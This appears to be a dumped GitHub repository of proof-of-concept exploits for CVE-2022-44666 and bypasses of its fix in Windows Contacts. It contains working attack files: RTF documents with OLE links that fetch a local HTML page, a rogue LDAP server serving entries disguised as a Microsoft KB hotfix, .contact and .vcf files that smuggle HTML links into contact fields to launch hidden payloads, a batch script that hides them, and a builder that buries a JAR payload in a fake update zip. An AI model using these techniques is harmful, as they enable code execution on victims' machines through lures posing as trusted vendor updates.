00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 687474703a2f2f3132372e302e302e313a383038312f706f632e68746d6c0000bbbbcccc200068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | -------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/url-protocol-ldap/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /bypass/diagcab-pocs/cert.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/diagcab-pocs/cert.cer -------------------------------------------------------------------------------- /bypass/diagcab-pocs/ldap-rogue-server/ldap-server.py: -------------------------------------------------------------------------------- 1 | # LDAP Rogue Server. Sample taken from https://ldaptor.readthedocs.io/en/latest/quickstart.html#ldap-server-quick-start 2 | # Fully tested with Python 2.7. To run, install the package from pip: pip install ldaptor. 3 | # URL protocol example => ldap://127.0.0.1:389/cn=Microsoft,ou=people,dc=example,dc=org 4 | 5 | import sys 6 | import io 7 | 8 | from twisted.application import service 9 | from twisted.internet.endpoints import serverFromString 10 | from twisted.internet.protocol import ServerFactory 11 | from twisted.python.components import registerAdapter 12 | from twisted.python import log 13 | from ldaptor.inmemory import fromLDIFFile 14 | from ldaptor.interfaces import IConnectedLDAPEntry 15 | from ldaptor.protocols.ldap.ldapserver import LDAPServer 16 | 17 | LDIF = b"""\ 18 | dn: dc=org 19 | dc: org 20 | objectClass: dcObject 21 | 22 | dn: dc=example,dc=org 23 | dc: example 24 | objectClass: dcObject 25 | objectClass: organization 26 | 27 | dn: ou=people,dc=example,dc=org 28 | objectClass: organizationalUnit 29 | ou: people 30 | 31 | dn: cn=Microsoft,ou=people,dc=example,dc=org 32 | cn: Microsoft 33 | gn: Microsoft 34 | company: Microsoft 35 | title: Microsoft KB5001337-hotfix 36 | mail:">Run-installer 37 | url:">Run-installer 38 | wwwhomepage:">Run-installer 39 | objectclass: top 40 | objectclass: person 41 | objectClass: inetOrgPerson 42 | 43 | """ 44 | 45 | 46 | class Tree: 47 | def __init__(self): 48 | global LDIF 49 | self.f = io.BytesIO(LDIF) 50 | d = fromLDIFFile(self.f) 51 | d.addCallback(self.ldifRead) 52 | 53 | def ldifRead(self, result): 54 | self.f.close() 55 | self.db = result 56 | 57 | 58 | class LDAPServerFactory(ServerFactory): 59 | protocol = LDAPServer 60 | 61 | def __init__(self, root): 62 | self.root = root 63 | 64 | def buildProtocol(self, addr): 65 | proto = self.protocol() 66 | proto.debug = self.debug 67 | proto.factory = self 68 | return proto 69 | 70 | 71 | if __name__ == "__main__": 72 | from twisted.internet import reactor 73 | 74 | if len(sys.argv) == 2: 75 | port = int(sys.argv[1]) 76 | else: 77 | port = 389 78 | # First of all, to show logging info in stdout : 79 | log.startLogging(sys.stderr) 80 | # We initialize our tree 81 | tree = Tree() 82 | # When the LDAP Server protocol wants to manipulate the DIT, it invokes 83 | # `root = interfaces.IConnectedLDAPEntry(self.factory)` to get the root 84 | # of the DIT. The factory that creates the protocol must therefore 85 | # be adapted to the IConnectedLDAPEntry interface. 86 | registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry) 87 | factory = LDAPServerFactory(tree.db) 88 | factory.debug = True 89 | application = service.Application("ldaptor-server") 90 | myService = service.IServiceCollection(application) 91 | serverEndpointStr = "tcp:{0}".format(port) 92 | e = serverFromString(reactor, serverEndpointStr) 93 | d = e.listen(factory) 94 | reactor.run() 95 | -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/hidden/@payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/further-pocs/MSWord/hidden/@payload.exe -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/hidden/@payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/further-pocs/MSWord/hidden/@payload.lnk -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/hidden/payload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/further-pocs/MSWord/hidden/payload.bin -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/setup-hidden.bat: -------------------------------------------------------------------------------- 1 | attrib +s +h +r hidden\payload.bin 2 | attrib +s +h +r hidden\@payload.exe 3 | attrib +s +h +r hidden\@payload.lnk 4 | attrib +s +h +r hidden -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/url-protocol-ldap/exploit.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/further-pocs/MSWord/url-protocol-ldap/exploit.docx -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/url-protocol-ldap/exploit.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 687474703a2f2f3132372e302e302e313a383038312f706f632e68746d6c0000bbbbcccc200068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/url-protocol-ldap/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /bypass/further-pocs/ldap-rogue-server/ldap-server.py: -------------------------------------------------------------------------------- 1 | # LDAP Rogue Server. Sample taken from https://ldaptor.readthedocs.io/en/latest/quickstart.html#ldap-server-quick-start 2 | # Fully tested with Python 2.7. To run, install the package from pip: pip install ldaptor. 3 | # URL protocol example => ldap://127.0.0.1:389/cn=Microsoft,ou=people,dc=example,dc=org 4 | 5 | import sys 6 | import io 7 | 8 | from twisted.application import service 9 | from twisted.internet.endpoints import serverFromString 10 | from twisted.internet.protocol import ServerFactory 11 | from twisted.python.components import registerAdapter 12 | from twisted.python import log 13 | from ldaptor.inmemory import fromLDIFFile 14 | from ldaptor.interfaces import IConnectedLDAPEntry 15 | from ldaptor.protocols.ldap.ldapserver import LDAPServer 16 | 17 | LDIF = b"""\ 18 | dn: dc=org 19 | dc: org 20 | objectClass: dcObject 21 | 22 | dn: dc=example,dc=org 23 | dc: example 24 | objectClass: dcObject 25 | objectClass: organization 26 | 27 | dn: ou=people,dc=example,dc=org 28 | objectClass: organizationalUnit 29 | ou: people 30 | 31 | dn: cn=Microsoft,ou=people,dc=example,dc=org 32 | cn: Microsoft 33 | gn: Microsoft 34 | company: Microsoft 35 | title: Microsoft KB5001337-hotfix 36 | mail:">Run-installer 37 | url:">Run-installer 38 | wwwhomepage:">Run-installer 39 | objectclass: top 40 | objectclass: person 41 | objectClass: inetOrgPerson 42 | 43 | """ 44 | 45 | 46 | class Tree: 47 | def __init__(self): 48 | global LDIF 49 | self.f = io.BytesIO(LDIF) 50 | d = fromLDIFFile(self.f) 51 | d.addCallback(self.ldifRead) 52 | 53 | def ldifRead(self, result): 54 | self.f.close() 55 | self.db = result 56 | 57 | 58 | class LDAPServerFactory(ServerFactory): 59 | protocol = LDAPServer 60 | 61 | def __init__(self, root): 62 | self.root = root 63 | 64 | def buildProtocol(self, addr): 65 | proto = self.protocol() 66 | proto.debug = self.debug 67 | proto.factory = self 68 | return proto 69 | 70 | 71 | if __name__ == "__main__": 72 | from twisted.internet import reactor 73 | 74 | if len(sys.argv) == 2: 75 | port = int(sys.argv[1]) 76 | else: 77 | port = 389 78 | # First of all, to show logging info in stdout : 79 | log.startLogging(sys.stderr) 80 | # We initialize our tree 81 | tree = Tree() 82 | # When the LDAP Server protocol wants to manipulate the DIT, it invokes 83 | # `root = interfaces.IConnectedLDAPEntry(self.factory)` to get the root 84 | # of the DIT. The factory that creates the protocol must therefore 85 | # be adapted to the IConnectedLDAPEntry interface. 86 | registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry) 87 | factory = LDAPServerFactory(tree.db) 88 | factory.debug = True 89 | application = service.Application("ldaptor-server") 90 | myService = service.IServiceCollection(application) 91 | serverEndpointStr = "tcp:{0}".format(port) 92 | e = serverFromString(reactor, serverEndpointStr) 93 | d = e.listen(factory) 94 | reactor.run() -------------------------------------------------------------------------------- /bypass/images/msrc-reply-case-closed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/images/msrc-reply-case-closed.png -------------------------------------------------------------------------------- /bypass/images/partialmatches-diaphora-wab32dll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/images/partialmatches-diaphora-wab32dll.png -------------------------------------------------------------------------------- /bypass/images/show-messagebox-wabexe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/images/show-messagebox-wabexe.png -------------------------------------------------------------------------------- /bypass/images/unmatched-diaphora-wab32dll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/images/unmatched-diaphora-wab32dll.png -------------------------------------------------------------------------------- /bypass/jar-poc/KB-3133722062023.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/jar-poc/KB-3133722062023.zip -------------------------------------------------------------------------------- /bypass/jar-poc/create-poc.py: -------------------------------------------------------------------------------- 1 | import os, random, shutil 2 | 3 | print("[+] Building junk files.") 4 | if not os.path.isdir("template"): 5 | os.mkdir("template") 6 | if not os.path.isdir("template/setup"): 7 | os.mkdir("template/setup") 8 | template_path = "" 9 | choice1 = random.randrange(10) 10 | for i in range(10): 11 | if not os.path.isdir("template/setup/kb-part." + str(i)): 12 | os.mkdir("template/setup/kb-part." + str(i)) 13 | choice2 = random.randrange(20) 14 | for j in range(20): 15 | if not os.path.isdir("template/setup/kb-part." + str(i) + "/kb-part" + str(j)): 16 | os.mkdir("template/setup/kb-part." + str(i) + "/kb-part" + str(j)) 17 | choice3 = random.randrange(20) 18 | for z in range(20): 19 | if i == choice1 and j == choice2 and z == choice3: 20 | shutil.copyfile("payload/calc.jar", "template/setup/kb-part." + str(i) + "/kb-part" + str(j) + "/KB@3133722062023$part" + str(z) + ".jar") 21 | template_path = "setup\\kb-part." + str(i) + "\\kb-part" + str(j) + "\\KB@3133722062023$part" + str(z) + ".jar" 22 | else: 23 | f = open("template/setup/kb-part." + str(i) + "/kb-part" + str(j) + "/" + random.choice(["x41", "", "x5c"]) + "KB@3133722062023$part" + str(z) + random.choice([".jar", ".dat", ""]), "w") 24 | f.write("chunk") 25 | f.close() 26 | 27 | print("[+] Update file installer.contact.") 28 | f = open("template.contact", "r") 29 | contact = f.read() 30 | f.close() 31 | f = open("template/installer.contact", "w") 32 | print("[+] Payload path is: %s" % template_path) 33 | installer = contact.replace("payload-path", template_path) 34 | f.write(installer) 35 | f.close() 36 | print("[+] Zipping.") 37 | shutil.make_archive('KB-3133722062023','zip','template') 38 | print("[+] Done.") 39 | -------------------------------------------------------------------------------- /bypass/jar-poc/payload/calc.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/jar-poc/payload/calc.jar -------------------------------------------------------------------------------- /bypass/report-pocs/bypass.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="hidden\@payload.lnk">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | j00sean 23 | j00sean 24 | j00sean 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a href="hidden\@payload.exe">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Security researcher 66 | 0day Factory 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /bypass/report-pocs/hidden/@payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/report-pocs/hidden/@payload.exe -------------------------------------------------------------------------------- /bypass/report-pocs/hidden/@payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/report-pocs/hidden/@payload.lnk -------------------------------------------------------------------------------- /bypass/report-pocs/hidden/payload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/report-pocs/hidden/payload.bin -------------------------------------------------------------------------------- /bypass/videos/install-certificate.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/install-certificate.gif -------------------------------------------------------------------------------- /bypass/videos/jar-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/jar-exploit.gif -------------------------------------------------------------------------------- /bypass/videos/ldap-msword-diagcab-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/ldap-msword-diagcab-exploit.gif -------------------------------------------------------------------------------- /bypass/videos/ldap-msword-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/ldap-msword-exploit.gif -------------------------------------------------------------------------------- /bypass/videos/simple-payload.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/simple-payload.gif -------------------------------------------------------------------------------- /further-pocs/MSWord/hidden/payload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/hidden/payload.bin -------------------------------------------------------------------------------- /further-pocs/MSWord/hidden/payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/hidden/payload.exe -------------------------------------------------------------------------------- /further-pocs/MSWord/hidden/payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/hidden/payload.lnk -------------------------------------------------------------------------------- /further-pocs/MSWord/poc/KB5014666-hotfix.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="notepad">Run-installer </a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | Microsoft KB5014666-hotfix 23 | Microsoft 24 | Microsoft 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a href="calc">Run-installer </a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">Run-installer </a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Microsoft Hotfix 66 | Microsoft Corporation 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /further-pocs/MSWord/poc/KB5014666-hotfix.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:Microsoft 4 | FN:Microsoft 5 | NICKNAME: Microsoft KB5014666-hotfix 6 | ORG:Microsoft Corporation 7 | TITLE:Microsoft Hotfix 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">Run-installer 12 | URL;WORK:">Run-installer 13 | URL;TYPE=HOME:">Run-installer 14 | END:VCARD -------------------------------------------------------------------------------- /further-pocs/MSWord/poc/poc.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/poc/poc.docx -------------------------------------------------------------------------------- /further-pocs/MSWord/poc/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 128 | 129 | -------------------------------------------------------------------------------- /further-pocs/MSWord/poc/poc.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 